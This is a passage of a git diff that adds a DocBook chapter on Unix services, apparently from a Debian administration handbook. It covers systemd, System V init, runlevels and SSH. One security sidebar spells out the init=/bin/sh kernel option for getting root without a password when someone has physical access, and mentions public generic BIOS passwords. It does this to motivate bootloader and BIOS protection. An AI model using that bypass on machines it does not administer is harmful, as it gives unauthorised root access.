diff --git a/tmp/cs-CZ/xml/09_unix-services.xml b/tmp/cs-CZ/xml/09_unix-services.xml
new file mode 100644
index 000000000..566812624
--- /dev/null
+++ b/tmp/cs-CZ/xml/09_unix-services.xml
@@ -0,0 +1,2211 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="unix-services" lang="cs-CZ">
+	<chapterinfo>
+		 <keywordset>
+			<keyword>System boot</keyword>
+			 <keyword>Initscripts</keyword>
+			 <keyword>SSH</keyword>
+			 <keyword>Telnet</keyword>
+			 <keyword>Rights</keyword>
+			 <keyword>Permissions</keyword>
+			 <keyword>Supervision</keyword>
+			 <keyword>Inetd</keyword>
+			 <keyword>Cron</keyword>
+			 <keyword>Backup</keyword>
+			 <keyword>Hotplug</keyword>
+			 <keyword>PCMCIA</keyword>
+			 <keyword>APM</keyword>
+			 <keyword>ACPI</keyword>
+
+		</keywordset>
+
+	</chapterinfo>
+	 <title>Unix Services</title>
+	 <highlights> <para>
+		This chapter covers a number of basic services that are common to many Unix systems. All administrators should be familiar with them.
+	</para>
+	 </highlights> <section id="sect.system-boot">
+		<title>System Boot</title>
+		 <indexterm>
+			<primary>booting</primary>
+			<secondary>the system</secondary>
+		</indexterm>
+		 <para>
+			When you boot the computer, the many messages scrolling by on the console display many automatic initializations and configurations that are being executed. Sometimes you may wish to slightly alter how this stage works, which means that you need to understand it well. That is the purpose of this section.
+		</para>
+		 <para>
+			First, the BIOS takes control of the computer, detects the disks, loads the <emphasis>Master Boot Record</emphasis>, and executes the bootloader. The bootloader takes over, finds the kernel on the disk, loads and executes it. The kernel is then initialized, and starts to search for and mount the partition containing the root filesystem, and finally executes the first program — <command>init</command>. Frequently, this “root partition” and this <command>init</command> are, in fact, located in a virtual filesystem that only exists in RAM (hence its name, “initramfs”, formerly called “initrd” for “initialization RAM disk”). This filesystem is loaded in memory by the bootloader, often from a file on a hard drive or from the network. It contains the bare minimum required by the kernel to load the “true” root filesystem: this may be driver modules for the hard drive, or other devices without which the system cannot boot, or, more frequently, initialization scripts and modules for assembling RAID arrays, opening encrypted partitions, activating LVM volumes, etc. Once the root partition is mounted, the initramfs hands over control to the real init, and the machine goes back to the standard boot process.
+		</para>
+		 <figure id="figure.boot-process-systemd">
+			<title>Boot sequence of a computer running Linux with systemd</title>
+			 <mediaobject>
+				<imageobject>
+					<imagedata fileref="images/startup-systemd.png" format="PNG" scalefit="1" width="80%" />
+				</imageobject>
+
+			</mediaobject>
+
+		</figure>
+		 <section id="sect.systemd">
+			<title>The systemd init system</title>
+			 <para>
+				The “real init” is currently provided by <emphasis role="pkg">systemd</emphasis> and this section documents this init system.
+			</para>
+			 <sidebar> <title><emphasis>CULTURE</emphasis> Before <command>systemd</command></title>
+			 <para>
+				<command>systemd</command> is a relatively recent “init system”, and although it was already available, to a certain extent, in <emphasis role="distribution">Wheezy</emphasis>, it has only become the default in Debian <emphasis role="distribution">Jessie</emphasis>. Previous releases relied, by default, on the “System V init” (in the <emphasis role="pkg">sysv-rc</emphasis> package), a much more traditional system. We describe the System V init later on.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>ALTERNATIVE</emphasis> Other boot systems</title>
+			 <para>
+				This book describes the boot system used by default in Debian <emphasis role="distribution">Jessie</emphasis> (as implemented by the <emphasis role="pkg">systemd</emphasis> package), as well as the previous default, <emphasis role="pkg">sysvinit</emphasis>, which is derived and inherited from <emphasis>System V</emphasis> Unix systems; there are others.
+			</para>
+			 <para>
+				<emphasis role="pkg">file-rc</emphasis> is a boot system with a very simple process. It keeps the principle of runlevels, but replaces the directories and symbolic links with a configuration file, which indicates to <command>init</command> the processes that must be started and their launch order.
+			</para>
+			 <para>
+				The <command>upstart</command> system is still not perfectly tested on Debian. It is event based: init scripts are no longer executed in a sequential order but in response to events such as the completion of another script upon which they are dependent. This system, started by Ubuntu, is present in Debian <emphasis role="distribution">Jessie</emphasis>, but is not the default; it comes, in fact, as a replacement for <emphasis role="pkg">sysvinit</emphasis>, and one of the tasks launched by <command>upstart</command> is to launch the scripts written for traditional systems, especially those from the <emphasis role="pkg">sysv-rc</emphasis> package.
+			</para>
+			 <para>
+				There are also other systems and other operating modes, such as <command>runit</command> or <command>minit</command>, but they are relatively specialized and not widespread.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>SPECIFIC CASE</emphasis> Booting from the network</title>
+			 <para>
+				In some configurations, the BIOS may be configured not to execute the MBR, but to seek its equivalent on the network, making it possible to build computers without a hard drive, or which are completely reinstalled on each boot. This option is not available on all hardware and it generally requires an appropriate combination of BIOS and network card.
+			</para>
+			 <para>
+				Booting from the network can be used to launch the <command>debian-installer</command> or FAI (see <xref linkend="sect.installation-methods" />).
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>BACK TO BASICS</emphasis> The process, a program instance</title>
+			 <indexterm>
+				<primary>process</primary>
+			</indexterm>
+			 <para>
+				A process is the representation in memory of a running program. It includes all of the information necessary for the proper execution of the software (the code itself, but also the data that it has in memory, the list of files that it has opened, the network connections it has established, etc.). A single program may be instantiated into several processes, not necessarily running under different user IDs.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>SECURITY</emphasis> Using a shell as <command>init</command> to gain root rights</title>
+			 <para>
+				By convention, the first process that is booted is the <command>init</command> program (which is a symbolic link to <filename>/lib/systemd/systemd</filename> by default). However, it is possible to pass an <literal>init</literal> option to the kernel indicating a different program.
+			</para>
+			 <indexterm>
+				<primary><command>init</command></primary>
+			</indexterm>
+			 <para>
+				Any person who is able to access the computer can press the <keycap>Reset</keycap> button, and thus reboot it. Then, at the bootloader's prompt, it is possible to pass the <literal>init=/bin/sh</literal> option to the kernel to gain root access without knowing the administrator's password.
+			</para>
+			 <para>
+				To prevent this, you can protect the bootloader itself with a password. You might also think about protecting access to the BIOS (a password protection mechanism is almost always available), without which a malicious intruder could still boot the machine on a removable media containing its own Linux system, which they could then use to access data on the computer's hard drives.
+			</para>
+			 <para>
+				Finally, be aware that most BIOS have a generic password available. Initially intended for troubleshooting for those who have forgotten their password, these passwords are now public and available on the Internet (see for yourself by searching for “generic BIOS passwords” in a search engine). All of these protections will thus impede unauthorized access to the machine without being able to completely prevent it. There is no reliable way to protect a computer if the attacker can physically access it; they could dismount the hard drives to connect them to a computer under their own control anyway, or even steal the entire machine, or erase the BIOS memory to reset the password…
+			</para>
+			 </sidebar> <para>
+				Systemd executes several processes, in charge of setting up the system: keyboard, drivers, filesystems, network, services. It does this while keeping a global view of the system as a whole, and the requirements of the components. Each component is described by a “unit file” (sometimes more); the general syntax is derived from the widely-used “*.ini files“ syntax, with <literal><replaceable>key</replaceable> = <replaceable>value</replaceable></literal> pairs grouped between <literal>[<replaceable>section</replaceable>]</literal> headers. Unit files are stored under <filename>/lib/systemd/system/</filename> and <filename>/etc/systemd/system/</filename>; they come in several flavours, but we will focus on “services” and “targets” here.
+			</para>
+			 <para>
+				A systemd “service file” describes a process managed by systemd. It contains roughly the same information as old-style init-scripts, but expressed in a declaratory (and much more concise) way. Systemd handles the bulk of the repetitive tasks (starting and stopping the process, checking its status, logging, dropping privileges, and so on), and the service file only needs to fill in the specifics of the process. For instance, here is the service file for SSH:
+			</para>
+			 
+<programlisting>[Unit]
+Description=OpenBSD Secure Shell server
+After=network.target auditd.service
+ConditionPathExists=!/etc/ssh/sshd_not_to_be_run
+
+[Service]
+EnvironmentFile=-/etc/default/ssh
+ExecStart=/usr/sbin/sshd -D $SSHD_OPTS
+ExecReload=/bin/kill -HUP $MAINPID
+KillMode=process
+Restart=on-failure
+
+[Install]
+WantedBy=multi-user.target
+Alias=sshd.service
+</programlisting>
+			 <para>
+				As you can see, there is very little code in there, only declarations. Systemd takes care of displaying progress reports, keeping track of the processes, and even restarting them when needed.
+			</para>
+			 <para>
+				A systemd “target file” describes a state of the system, where a set of services are known to be operational. It can be thought of as an equivalent of the old-style runlevel. One of the targets is <literal>local-fs.target</literal>; when it is reached, the rest of the system can assume that all local filesystems are mounted and accessible. Other targets include <literal>network-online.target</literal> and <literal>sound.target</literal>. The dependencies of a target can be listed either within the target file (in the <literal>Requires=</literal> line), or using a symbolic link to a service file in the <literal>/lib/systemd/system/<replaceable>targetname</replaceable>.target.wants/</literal> directory. For instance, <filename>/etc/systemd/system/printer.target.wants/</filename> contains a link to <filename>/lib/systemd/system/cups.service</filename>; systemd will therefore ensure CUPS is running in order to reach <literal>printer.target</literal>.
+			</para>
+			 <para>
+				Since unit files are declarative rather than scripts or programs, they cannot be run directly, and they are only interpreted by systemd; several utilities therefore allow the administrator to interact with systemd and control the state of the system and of each component.
+			</para>
+			 <para>
+				The first such utility is <command>systemctl</command>. When run without any arguments, it lists all the unit files known to systemd (except those that have been disabled), as well as their status. <command>systemctl status</command> gives a better view of the services, as well as the related processes. If given the name of a service (as in <command>systemctl status ntp.service</command>), it returns even more details, as well as the last few log lines related to the service (more on that later).
+			</para>
+			 <para>
+				Starting a service by hand is a simple matter of running <command>systemctl start <replaceable>servicename</replaceable>.service</command>. As one can guess, stopping the service is done with <command>systemctl stop <replaceable>servicename</replaceable>.service</command>; other subcommands include <command>reload</command> and <command>restart</command>.
+			</para>
+			 <para>
+				To control whether a service is active (i.e. whether it will get started automatically on boot), use <command>systemctl enable <replaceable>servicename</replaceable>.service</command> (or <command>disable</command>). <command>is-enabled</command> allows checking the status of the service.
+			</para>
+			 <para>
+				An interesting feature of systemd is that it includes a logging component named <command>journald</command>. It comes as a complement to more traditional logging systems such as <command>syslogd</command>, but it adds interesting features such as a formal link between a service and the messages it generates, and the ability to capture error messages generated by its initialisation sequence. The messages can be displayed later on, with a little help from the <command>journalctl</command> command. Without any arguments, it simply spews all log messages that occurred since system boot; it will rarely be used in such a manner. Most of the time, it will be used with a service identifier:
+			</para>
+			 
+<screen><computeroutput># </computeroutput><userinput>journalctl -u ssh.service
+</userinput><computeroutput>-- Logs begin at Tue 2015-03-31 10:08:49 CEST, end at Tue 2015-03-31 17:06:02 CEST. --
+Mar 31 10:08:55 mirtuel sshd[430]: Server listening on 0.0.0.0 port 22.
+Mar 31 10:08:55 mirtuel sshd[430]: Server listening on :: port 22.
+Mar 31 10:09:00 mirtuel sshd[430]: Received SIGHUP; restarting.
+Mar 31 10:09:00 mirtuel sshd[430]: Server listening on 0.0.0.0 port 22.
+Mar 31 10:09:00 mirtuel sshd[430]: Server listening on :: port 22.
+Mar 31 10:09:32 mirtuel sshd[1151]: Accepted password for roland from 192.168.1.129 port 53394 ssh2
+Mar 31 10:09:32 mirtuel sshd[1151]: pam_unix(sshd:session): session opened for user roland by (uid=0)
+</computeroutput></screen>
+			 <para>
+				Another useful command-line flag is <command>-f</command>, which instructs <command>journalctl</command> to keep displaying new messages as they are emitted (much in the manner of <command>tail -f <replaceable>file</replaceable></command>).
+			</para>
+			 <para>
+				If a service doesn't seem to be working as expected, the first step to solve the problem is to check that the service is actually running with <command>systemctl status</command>; if it is not, and the messages given by the first command are not enough to diagnose the problem, check the logs gathered by journald about that service. For instance, assume the SSH server doesn't work:
+			</para>
+			 
+<screen><computeroutput># </computeroutput><userinput>systemctl status ssh.service
+</userinput><computeroutput>● ssh.service - OpenBSD Secure Shell server
+   Loaded: loaded (/lib/systemd/system/ssh.service; enabled)
+   Active: failed (Result: start-limit) since Tue 2015-03-31 17:30:36 CEST; 1s ago
+  Process: 1023 ExecReload=/bin/kill -HUP $MAINPID (code=exited, status=0/SUCCESS)
+  Process: 1188 ExecStart=/usr/sbin/sshd -D $SSHD_OPTS (code=exited, status=255)
+ Main PID: 1188 (code=exited, status=255)
+
+Mar 31 17:30:36 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:36 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:36 mirtuel systemd[1]: ssh.service start request repeated too quickly, refusing to start.
+Mar 31 17:30:36 mirtuel systemd[1]: Failed to start OpenBSD Secure Shell server.
+Mar 31 17:30:36 mirtuel systemd[1]: Unit ssh.service entered failed state.
+# </computeroutput><userinput>journalctl -u ssh.service
+</userinput><computeroutput>-- Logs begin at Tue 2015-03-31 17:29:27 CEST, end at Tue 2015-03-31 17:30:36 CEST. --
+Mar 31 17:29:27 mirtuel sshd[424]: Server listening on 0.0.0.0 port 22.
+Mar 31 17:29:27 mirtuel sshd[424]: Server listening on :: port 22.
+Mar 31 17:29:29 mirtuel sshd[424]: Received SIGHUP; restarting.
+Mar 31 17:29:29 mirtuel sshd[424]: Server listening on 0.0.0.0 port 22.
+Mar 31 17:29:29 mirtuel sshd[424]: Server listening on :: port 22.
+Mar 31 17:30:10 mirtuel sshd[1147]: Accepted password for roland from 192.168.1.129 port 38742 ssh2
+Mar 31 17:30:10 mirtuel sshd[1147]: pam_unix(sshd:session): session opened for user roland by (uid=0)
+Mar 31 17:30:35 mirtuel sshd[1180]: /etc/ssh/sshd_config line 28: unsupported option "yess".
+Mar 31 17:30:35 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:35 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:35 mirtuel sshd[1182]: /etc/ssh/sshd_config line 28: unsupported option "yess".
+Mar 31 17:30:35 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:35 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:35 mirtuel sshd[1184]: /etc/ssh/sshd_config line 28: unsupported option "yess".
+Mar 31 17:30:35 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:35 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:36 mirtuel sshd[1186]: /etc/ssh/sshd_config line 28: unsupported option "yess".
+Mar 31 17:30:36 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:36 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:36 mirtuel sshd[1188]: /etc/ssh/sshd_config line 28: unsupported option "yess".
+Mar 31 17:30:36 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:36 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:36 mirtuel systemd[1]: ssh.service start request repeated too quickly, refusing to start.
+Mar 31 17:30:36 mirtuel systemd[1]: Failed to start OpenBSD Secure Shell server.
+Mar 31 17:30:36 mirtuel systemd[1]: Unit ssh.service entered failed state.
+# </computeroutput><userinput>vi /etc/ssh/sshd_config
+</userinput><computeroutput># </computeroutput><userinput>systemctl start ssh.service
+</userinput><computeroutput># </computeroutput><userinput>systemctl status ssh.service
+</userinput><computeroutput>● ssh.service - OpenBSD Secure Shell server
+   Loaded: loaded (/lib/systemd/system/ssh.service; enabled)
+   Active: active (running) since Tue 2015-03-31 17:31:09 CEST; 2s ago
+  Process: 1023 ExecReload=/bin/kill -HUP $MAINPID (code=exited, status=0/SUCCESS)
+ Main PID: 1222 (sshd)
+   CGroup: /system.slice/ssh.service
+           └─1222 /usr/sbin/sshd -D
+# </computeroutput></screen>
+			 <para>
+				After checking the status of the service (failed), we went on to check the logs; they indicate an error in the configuration file. After editing the configuration file and fixing the error, we restart the service, then verify that it is indeed running.
+			</para>
+			 <sidebar><title><emphasis>GOING FURTHER</emphasis> Other types of unit files</title>
+			 <para>
+				We have only described the most basic of systemd's capabilities in this section. It offers many other interesting features; we will only list a few here:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						socket activation: a “socket” unit file can be used to describe a network or Unix socket managed by systemd; this means that the socket will be created by systemd, and the actual service may be started on demand when an actual connection attempt comes. This roughly replicates the feature set of <command>inetd</command>. See <citerefentry><refentrytitle>systemd.socket</refentrytitle>
+						<manvolnum>5</manvolnum></citerefentry>.
+					</para>
+				</listitem>
+				 <listitem>
+					<para>
+						timers: a “timer” unit file describes events that occur with a fixed frequency or on specific times; when a service is linked to such a timer, the corresponding task will be executed whenever the timer fires. This allows replicating part of the <command>cron</command> features. See <citerefentry><refentrytitle>systemd.timer</refentrytitle>
+						<manvolnum>5</manvolnum></citerefentry>.
+					</para>
+				</listitem>
+				 <listitem>
+					<para>
+						network: a “network“ unit file describes a network interface, which allows configuring such interfaces as well as expressing that a service depends on one particular interface being up.
+					</para>
+				</listitem>
+
+			</itemizedlist>
+			</sidebar>
+		</section>
+		 <section id="sect.sysvinit">
+			<title>The System V init system</title>
+			 <para>
+				The System V init system (which we'll call init for brevity) executes several processes, following instructions from the <filename>/etc/inittab</filename> file. The first program that is executed (which corresponds to the <emphasis>sysinit</emphasis> step) is <command>/etc/init.d/rcS</command>, a script that executes all of the programs in the <filename>/etc/rcS.d/</filename> directory. <indexterm><primary><filename>/etc/init.d/rcS</filename></primary></indexterm> <indexterm><primary><filename>rcS</filename></primary></indexterm> <indexterm><primary><filename>/etc/init.d/rcS.d/</filename></primary></indexterm> <indexterm><primary><filename>rcS.d</filename></primary></indexterm>
+			</para>
+			 <para>
+				Among these, you will find successively programs in charge of:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						configuring the console's keyboard;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						loading drivers: most of the kernel modules are loaded by the kernel itself as the hardware is detected; extra drivers are then loaded automatically when the corresponding modules are listed in <filename>/etc/modules</filename>;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						checking the integrity of filesystems;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						mounting local partitions;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						configuring the network;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						mounting network filesystems (NFS).
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Kernel modules and options</title>
+			 <indexterm>
+				<primary>modules</primary>
+				<secondary>kernel modules</secondary>
+			</indexterm>
+			 <para>
+				Kernel modules also have options that can be configured by putting some files in <filename>/etc/modprobe.d/</filename>. These options are defined with directives like this: <literal>options <replaceable>module-name</replaceable> <replaceable>option-name</replaceable>=<replaceable>option-value</replaceable></literal>. Several options can be specified with a single directive if necessary.
+			</para>
+			 <para>
+				These configuration files are intended for <command>modprobe</command> — the program that loads a kernel module with its dependencies (modules can indeed call other modules). This program is provided by the <emphasis role="pkg">kmod</emphasis> package.
+			</para>
+			 <indexterm>
+				<primary><command>modprobe</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="pkg">kmod</emphasis></primary>
+			</indexterm>
+			 </sidebar> <para>
+				After this stage, <command>init</command> takes over and starts the programs enabled in the default runlevel (which is usually runlevel 2). It executes <command>/etc/init.d/rc 2</command>, a script that starts all services which are listed in <filename>/etc/rc2.d/</filename> and whose names start with the “S” letter. The two-figures number that follows had historically been used to define the order in which services had to be started, but nowadays the default boot system uses <command>insserv</command>, which schedules everything automatically based on the scripts' dependencies. Each boot script thus declares the conditions that must be met to start or stop the service (for example, if it must start before or after another service); <command>init</command> then launches them in the order that meets these conditions. The static numbering of scripts is therefore no longer taken into consideration (but they must always have a name beginning with “S” followed by two digits and the actual name of the script used for the dependencies). Generally, base services (such as logging with <command>rsyslog</command>, or port assignment with <command>portmap</command>) are started first, followed by standard services and the graphical interface (<command>gdm3</command>).
+			</para>
+			 <para>
+				This dependency-based boot system makes it possible to automate re-numbering, which could be rather tedious if it had to be done manually, and it limits the risks of human error, since scheduling is conducted according to the parameters that are indicated. Another benefit is that services can be started in parallel when they are independent from one another, which can accelerate the boot process.
+			</para>
+			 <indexterm>
+				<primary>runlevel</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>level, runlevel</primary>
+			</indexterm>
+			 <para>
+				<command>init</command> distinguishes several runlevels, so it can switch from one to another with the <command>telinit <replaceable>new-level</replaceable></command> command. Immediately, <command>init</command> executes <command>/etc/init.d/rc</command> again with the new runlevel. This script will then start the missing services and stop those that are no longer desired. To do this, it refers to the content of the <filename>/etc/rc<replaceable>X</replaceable>.d</filename> (where <replaceable>X</replaceable> represents the new runlevel). Scripts starting with “S” (as in “Start”) are services to be started; those starting with “K” (as in “Kill”) are the services to be stopped. The script does not start any service that was already active in the previous runlevel.
+			</para>
+			 <para>
+				By default, System V init in Debian uses four different runlevels:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						Level 0 is only used temporarily, while the computer is powering down. As such, it only contains many “K” scripts.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						Level 1, also known as single-user mode, corresponds to the system in degraded mode; it includes only basic services, and is intended for maintenance operations where interactions with ordinary users are not desired.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						Level 2 is the level for normal operation, which includes networking services, a graphical interface, user logins, etc.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						Level 6 is similar to level 0, except that it is used during the shutdown phase that precedes a reboot.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+				Other levels exist, especially 3 to 5. By default they are configured to operate the same way as level 2, but the administrator can modify them (by adding or deleting scripts in the corresponding <filename>/etc/rc<replaceable>X</replaceable>.d</filename> directories) to adapt them to particular needs.
+			</para>
+			 <figure id="figure.boot-process-sysvinit">
+				<title>Boot sequence of a computer running Linux with System V init</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/startup-sysvinit.png" format="PNG" scalefit="1" width="80%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+			 <indexterm>
+				<primary>initialization script</primary>
+			</indexterm>
+			 <para>
+				All the scripts contained in the various <filename>/etc/rc<replaceable>X</replaceable>.d</filename> directories are really only symbolic links — created upon package installation by the <command>update-rc.d</command> program — pointing to the actual scripts which are stored in <filename>/etc/init.d/</filename>. The administrator can fine tune the services available in each runlevel by re-running <command>update-rc.d</command> with adjusted parameters. The <citerefentry><refentrytitle>update-rc.d</refentrytitle>
+				<manvolnum>1</manvolnum></citerefentry> manual page describes the syntax in detail. Please note that removing all symbolic links (with the <literal>remove</literal> parameter) is not a good method to disable a service. Instead you should simply configure it to not start in the desired runlevel (while preserving the corresponding calls to stop it in the event that the service runs in the previous runlevel). Since <command>update-rc.d</command> has a somewhat convoluted interface, you may prefer using <command>rcconf</command> (from the <emphasis role="pkg">rcconf</emphasis> package) which provides a more user-friendly interface.
+			</para>
+			 <indexterm>
+				<primary><command>update-rc.d</command></primary>
+			</indexterm>
+			 <sidebar> <title><emphasis>DEBIAN POLICY</emphasis> Restarting services</title>
+			 <indexterm>
+				<primary><command>invoke-rc.d</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>service</primary>
+				<secondary>restart</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>restarting services</primary>
+			</indexterm>
+			 <para>
+				The maintainer scripts for Debian packages will sometimes restart certain services to ensure their availability or get them to take certain options into account. The command that controls a service — <command>service <replaceable>service</replaceable> <replaceable>operation</replaceable></command> — doesn't take runlevel into consideration, assumes (wrongly) that the service is currently being used, and may thus initiate incorrect operations (starting a service that was deliberately stopped, or stopping a service that is already stopped, etc.). Debian therefore introduced the <command>invoke-rc.d</command> program: this program must be used by maintainer scripts to run services initialization scripts and it will only execute the necessary commands. Note that, contrary to common usage, the <filename>.d</filename> suffix is used here in a program name, and not in a directory.
+			</para>
+			 </sidebar> <para>
+				Finally, <command>init</command> starts control programs for various virtual consoles (<command>getty</command>). It displays a prompt, waiting for a username, then executes <command>login <replaceable>user</replaceable></command> to initiate a session.
+			</para>
+			 <indexterm>
+				<primary><command>getty</command></primary>
+			</indexterm>
+			 <sidebar> <title><emphasis>VOCABULARY</emphasis> Console and terminal</title>
+			 <para>
+				The first computers were usually separated into several, very large parts: the storage enclosure and the central processing unit were separate from the peripheral devices used by the operators to control them. These were part of a separate furniture, the “console”. This term was retained, but its meaning has changed. It has become more or less synonymous with “terminal”, being a keyboard and a screen.
+			</para>
+			 <para>
+				With the development of computers, operating systems have offered several virtual consoles to allow for several independent sessions at the same time, even if there is only one keyboard and screen. Most GNU/Linux systems offer six virtual consoles (in text mode), accessible by typing the key combinations <keycombo action="simul"> <keycap>Control</keycap> <keycap>Alt</keycap> <keycap>F1</keycap> </keycombo> through <keycombo action="simul"> <keycap>Control</keycap> <keycap>Alt</keycap> <keycap>F6</keycap> </keycombo>.
+			</para>
+			 <para>
+				By extension, the terms “console” and “terminal” can also refer to a terminal emulator in a graphical X11 session (such as <command>xterm</command>, <command>gnome-terminal</command> or <command>konsole</command>).
+			</para>
+			 </sidebar>
+		</section>
+
+	</section>
+	 <section id="sect.remote-login">
+		<title>Remote Login</title>
+		 <para>
+			It is essential for an administrator to be able to connect to a computer remotely. Servers, confined in their own room, are rarely equipped with permanent keyboards and monitors — but they are connected to the network.
+		</para>
+		 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Client, server</title>
+		 <indexterm>
+			<primary>client</primary>
+			<secondary>client/server architecture</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>server</primary>
+			<secondary>client/server architecture</secondary>
+		</indexterm>
+		 <para>
+			A system where several processes communicate with each other is often described with the “client/server” metaphor. The server is the program that takes requests coming from a client and executes them. It is the client that controls operations, the server doesn't take any initiative of its own.
+		</para>
+		 </sidebar> <indexterm>
+			<primary>login</primary>
+			<secondary>remote login</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>remote login</primary>
+		</indexterm>
+		 <section id="sect.ssh">
+			<title>Secure Remote Login: SSH</title>
+			 <indexterm>
+				<primary>SSH</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Secure Shell</primary>
+			</indexterm>
+			 <para>
+				The <emphasis>SSH</emphasis> (Secure SHell) protocol was designed with security and reliability in mind. Connections using SSH are secure: the partner is authenticated and all data exchanges are encrypted.
+			</para>
+			 <sidebar> <title><emphasis>CULTURE</emphasis> Telnet and RSH are obsolete</title>
+			 <indexterm>
+				<primary><command>telnet</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>rsh</command></primary>
+			</indexterm>
+			 <para>
+				Before SSH, <emphasis>Telnet</emphasis> and <emphasis>RSH</emphasis> were the main tools used to login remotely. They are now largely obsolete and should no longer be used even if Debian still provides them.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>VOCABULARY</emphasis> Authentication, encryption</title>
+			 <para>
+				When you need to give a client the ability to conduct or trigger actions on a server, security is important. You must ensure the identity of the client; this is authentication. This identity usually consists of a password that must be kept secret, or any other client could get the password. This is the purpose of encryption, which is a form of encoding that allows two systems to communicate confidential information on a public channel while protecting it from being readable to others.
+			</para>
+			 <para>
+				Authentication and encryption are often mentioned together, both because they are frequently used together, and because they are usually implemented with similar mathematical concepts.
+			</para>
+			 </sidebar> <para>
+				SSH also offers two file transfer services. <command>scp</command> is a command line tool that can be used like <command>cp</command>, except that any path to another machine is prefixed with the machine's name, followed by a colon.
+			</para>
+			 
+<screen><computeroutput>$ </computeroutput><userinput>scp file machine:/tmp/</userinput></screen>
+			 <para>
+				<command>sftp</command> is an interactive command, similar to <command>ftp</command>. In a single session, <command>sftp</command> can transfer several files, and it is possible to manipulate remote files with it (delete, rename, change permissions, etc.).
+			</para>
+			 <indexterm>
+				<primary><command>scp</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>sftp</command></primary>
+			</indexterm>
+			 <para>
+				Debian uses OpenSSH, a free version of SSH maintained by the <command>OpenBSD</command> project (a free operating system based on the BSD kernel, focused on security) and fork of the original SSH software developed by the SSH Communications Security Corp company, of Finland. This company initially developed SSH as free software, but eventually decided to continue its development under a proprietary license. The OpenBSD project then created OpenSSH to maintain a free version of SSH.
+			</para>
+			 <indexterm>
+				<primary>OpenSSH</primary>
+			</indexterm>
+			 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> <foreignphrase>Fork</foreignphrase></title>
+			 <indexterm>
+				<primary>fork</primary>
+			</indexterm>
+			 <para>
+				A “fork”, in the software field, means a new project that starts as a clone of an existing project, and that will compete with it. From there on, both software will usually quickly diverge in terms of new developments. A fork is often the result of disagreements within the development team.
+			</para>
+			 <para>
+				The option to fork a project is a direct result of the very nature of free software; a fork is a healthy event when it enables the continuation of a project as free software (for example in case of license changes). A fork arising from technical or personal disagreements is often a waste of human resources; another resolution would be preferable. Mergers of two projects that previously went through a prior fork are not unheard of.
+			</para>
+			 </sidebar> <para>
+				OpenSSH is split into two packages: the client part is in the <emphasis role="pkg">openssh-client</emphasis> package, and the server is in the <emphasis role="pkg">openssh-server</emphasis> package. The <emphasis role="pkg">ssh</emphasis> meta-package depends on both parts and facilitates installation of both (<command>apt install ssh</command>).
+			</para>
+			 <section id="sect.ssh-key-based-auth">
+				<title>Key-Based Authentication</title>
+				 <para>
+					Each time someone logs in over SSH, the remote server asks for a password to authenticate the user. This can be problematic if you want to automate a connection, or if you use a tool that requires frequent connections over SSH. This is why SSH offers a key-based authentication system.
+				</para>
+				 <para>
